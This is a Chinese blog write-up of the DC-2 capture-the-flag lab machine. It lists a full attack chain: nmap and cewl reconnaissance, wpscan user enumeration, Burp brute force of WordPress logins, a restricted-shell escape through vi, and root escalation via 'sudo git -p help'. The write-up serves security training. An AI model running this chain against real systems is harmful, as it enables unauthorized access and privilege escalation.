【DC系列】DC-2靶机实战详细讲解

【DC系列02】DC-2靶机复盘

第一步我们还是先扫描出靶机ip地址

nmap -A 192.168.197.0/24 -p-

ip是192.168.197.168 并且还扫描出ssh端口是7744

image-20230627202557668

我们找到ip地址后要设置个东西,在hosts文件中加入这么一行。

linux直接在/etc/hosts文件中最后添加就行

Windows是WINDOWS\system32\drivers\etc\hosts这个目录,在hosts文件最后添加这么一行就可以

image-20230627202937466

然后我们打开网站,在Flag看到了提醒,就是告诉我们只需要cewl扫描出来的字典就行,密码都在这里面。

image-20230627202005827

cewl http://dc-2 (-d 目录深度,默认是2.-w 写到一个文件中)

cewl http://dc-2 -w dc2_pass.txt

image-20230627202233556

image-20230627200953237

cat dc2_pass.txt|wc -l 查看有多少行

从主页我们就可以看出来这是一个wordpress搭建的网站

image-20230627201417726

wordpress登陆地址/wp-login.php

image-20230627201332341

wpscan --url http://dc-2/ --enumerate u 可以查找这个网站有什么用户名,这样我们用户名也就都有了

image-20230627201540005

然后用bp最后一个模式(集束炸弹)来爆破一下,找到了两个账户

image-20230627194229590

经过测试两个都能登陆login.php,但是没什么用

后来经过尝试tom可以ssh远程登陆,这里要注意端口号是7744

image-20230627202523349

进去后我们发现好多命令都不能用,甚至cd都不能用,经过尝试发现vi这个命令可以用,less也可以用。

这时候我们vi一个文件,然后冒号:,输入以下命令。

这个shell需要时系统中原本就有的变量,不能自己捏造变量。

set shell=/bin/sh

image-20230627195021223

image-20230627195635736

然后在shell一下,就自动退出vi编辑器了

image-20230627200329788

这时候执行这个代码,命令权限就有了,原本su命令是不能用的,现在就可以用了

export PATH='/usr/bin:/bin'

image-20230627200357621

image-20230627195507451

jerry不能远程ssh登陆,这里我们su jerry登陆。

image-20230627200427654

登陆成功后sudo -l查看能使用什么root命令,发现可以使用git命令。

在网上搜索git命令怎么提权。发现很简单。

只需要先输入

sudo git -p help

再输入以下:

!/bin/bash  

就提权成功了!!!

image-20230627200733090

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值